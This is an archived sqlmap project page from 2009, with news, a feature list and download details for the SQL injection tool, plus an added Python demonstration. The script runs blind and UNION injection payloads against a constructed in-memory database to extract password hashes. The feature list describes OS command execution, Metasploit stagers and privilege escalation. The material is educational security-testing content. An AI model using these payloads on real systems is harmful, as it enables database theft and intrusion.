News
- May 8, 2009: the sqlmap version 0.6.4 Debian package has been officially accepted in the Debian repository! Read the details in my blog post.
- April 22, 2009: sqlmap 0.7 release candidate 1 is out with all of the new features described during my presentation at Black Hat Europe 2009. The presentation whitepaper and slides are also available.
- April 3, 2009: sqlmap 0.7 will be released at Black Hat Europe 2009 during my presentation titled Advanced SQL Injection exploitation to operating system full control.
- March 11, 2009: my presentation titled SQL injection: Not only AND 1=1 is online on the SlideShare site.
- February 3, 2009: sqlmap 0.6.4 is out with many new enhancements and a few major bugs fixed.
- January 9, 2009: my presentation titled SQL injection exploitation internals is online on the SlideShare site.
- December 18, 2008: sqlmap 0.6.3 is out with many new enhancements and some major bugs fixed.
- November 21, 2008: posted three positions for contributing to sqlmap development on the SourceForge Project Help page. If you'd like to contribute, check them out and get back to me by e-mail.
- November 9, 2008: the sqlmap Subversion repository is now online at https://svn.sqlmap.org/sqlmap/trunk/sqlmap/. You can check it out if you want to try the development version.
- November 4, 2008: sqlmap 0.6.2 is out with some major bugs fixed and a few minor enhancements.
- October 24, 2008: sqlmap auxiliary module committed to the official Metasploit Framework 3 Subversion repository. Thanks Efrain Torres!
- October 20, 2008: sqlmap 0.6.1 is out with the integration with Metasploit, a few new features and some bugs fixed.
- September 1, 2008: sqlmap 0.6 is out with many new features, complete code refactoring and many bugs fixed.
Introduction
sqlmap is an open source command-line automatic SQL injection tool.
Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint; retrieve the DBMS session user and current database; enumerate users, password hashes, privileges and databases; dump entire tables or user-specified tables and columns; run their own SQL statement; read or write text or binary files on the file system; execute arbitrary commands on the operating system; establish an out-of-band stateful connection between the attacker box and the database server via a Metasploit payload stager, a database stored procedure buffer overflow exploit or an SMB relay attack; and more.
Features
Some of the major features implemented in sqlmap include:
- Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. Besides these four database management systems, sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
- Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries. sqlmap can also test for time-based blind SQL injection.
- Extensive back-end database management system software and underlying operating system fingerprint based upon inband error messages, banner parsing, function output comparison and specific features such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it. sqlmap is also able to fingerprint the web server operating system, the web application technology and, in some circumstances, the back-end DBMS operating system.
- Support to retrieve, on all four fully supported back-end database management systems, the banner, current user and current database, to check whether the current user is a database administrator, to enumerate users, users' password hashes, users' privileges, databases, tables and columns, to dump table entries or the whole database management system, and to run the user's own SQL statement.
- Support to read text or binary files from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands on the database server's underlying operating system when the database software is MySQL or PostgreSQL, via user-defined function injection, or Microsoft SQL Server, via the xp_cmdshell() stored procedure.
- Support to establish an out-of-band stateful connection between the attacker box and the database server's underlying operating system via:
  - a stand-alone payload stager created by Metasploit, supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
  - exploitation of the Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004), with multi-stage Metasploit payload support;
  - an SMB reflection attack, with a UNC path request from the database server to the attacker box, using the Metasploit smb_relay exploit on the attacker box.
- Support for database process user privilege escalation via Windows Access Token kidnapping on MySQL and Microsoft SQL Server, using either Meterpreter's incognito extension or the Churrasco stand-alone executable.
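As an added illustration of the first two injection techniques listed above (inferential blind and UNION query), and not code from sqlmap itself: the script below builds a constructed, deliberately vulnerable lookup on an in-memory SQLite table and extracts the same value both ways, counting how many "requests" each technique costs. The `users` table, its rows and the `vulnerable_page` function are assumptions made up for the demonstration; a real target answers over HTTP, and sqlmap does the equivalent work against MySQL, Oracle, PostgreSQL and Microsoft SQL Server.

```python
"""Inferential (boolean-based blind) versus UNION query (inband) SQL injection
against a constructed, deliberately vulnerable lookup.  Added example, not
sqlmap's code.  SQLite in memory keeps it runnable offline; the table, rows
and the page behaviour are made up for the demonstration."""
import sqlite3

_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pwhash TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'bob',   'd8578edf8458ce06fbc5bb76a58c5ca4');
""")

REQUESTS = {"count": 0}  # how many "HTTP requests" a technique has used


def vulnerable_page(user_id: str):
    """Stands in for the web application.  It builds the query by string
    concatenation (the bug) and shows only the first 'name' value, or
    None when no row matched: that is all an attacker gets to observe."""
    REQUESTS["count"] += 1
    sql = "SELECT name FROM users WHERE id=" + user_id
    row = _conn.execute(sql).fetchone()
    return row[0] if row else None


# --- inferential blind: one true/false bit per request ----------------------

def oracle(condition: str) -> bool:
    """'AND 1=1' style test: the page either shows user 1 or shows nothing."""
    return vulnerable_page(f"1 AND ({condition})") is not None


def _binary_search(target_gt, lo: int, hi: int) -> int:
    """Return the hidden integer t in [lo, hi] given only target_gt(v) = (t > v)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if target_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Recover the string value of SQL expression `expr` without ever seeing
    it in a response: first its length, then each character by binary
    search over the ASCII range (about 7 requests per character)."""
    length = _binary_search(lambda v: oracle(f"length(({expr})) > {v}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _binary_search(
            lambda v, p=pos: oracle(f"unicode(substr(({expr}),{p},1)) > {v}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


# --- UNION query (inband): the data comes back inside the page itself -------

def union_dump() -> str:
    """Same bug, inband technique: make the injected SELECT's output land in
    the one column the page displays.  A single request returns every row."""
    payload = ("0 UNION SELECT group_concat(entry, ',') FROM "
               "(SELECT name || ':' || pwhash AS entry FROM users ORDER BY id)")
    return vulnerable_page(payload)


if __name__ == "__main__":
    REQUESTS["count"] = 0
    secret = blind_extract("SELECT pwhash FROM users WHERE name='admin'")
    print(f"blind: {secret} after {REQUESTS['count']} requests")
    REQUESTS["count"] = 0
    print(f"union: {union_dump()} after {REQUESTS['count']} request")
```

The blind path never sees the hash in any response; it only sees whether user 1's name is displayed, which is why the request count matters so much in practice and why sqlmap extracts a length first and then searches each character. The UNION path needs the injected SELECT to match the original column count and to reach a column the page actually renders, which is the part sqlmap automates when it probes for the right number of columns.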
Download
sqlmap 0.7 release candidate 1 can be downloaded as a gzip-compressed source archive or as a zip-compressed source archive.
WARNING: This release is a candidate; it only works on Linux, so please do not complain that it does not work on your Windows or Mac OS X systems.
sqlmap can be downloaded from its SourceForge File List page.
It is available in various formats:
You can also check out the source code from the sqlmap Subversion repository to try the development release:
$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/
Documentation
Mailing lists
sqlmap has two mailing lists hosted on SourceForge:
The sqlmap-users mailing list is the preferred way to ask questions, report bugs, suggest new features and discuss with other users. The mailing list is archived online. To subscribe, use the online web form.
The sqlmap-devel mailing list is for advanced users and developers who want to contribute to sqlmap development and anyone with questions or suggestions concerning the code base. The mailing list is archived online. To subscribe, use the online web form.
License
sqlmap is released under the terms of the GNU General Public License v2.
sqlmap is copyrighted by Bernardo Damele A. G. and Daniele Bellucci.
Author
Bernardo Damele A. G.
(inquis) - Lead developer
PGP Key ID: 0x05F5A30F
Contribute
If you want to contribute to sqlmap development by reporting a bug, providing a patch or commenting on the code base, or if you simply need help running sqlmap, first refer to the sqlmap documentation, then search the sqlmap mailing lists' online archives and, if you still have something to say, do so on the appropriate sqlmap mailing list. If nobody gets back to you, then drop me an e-mail.
Sponsorship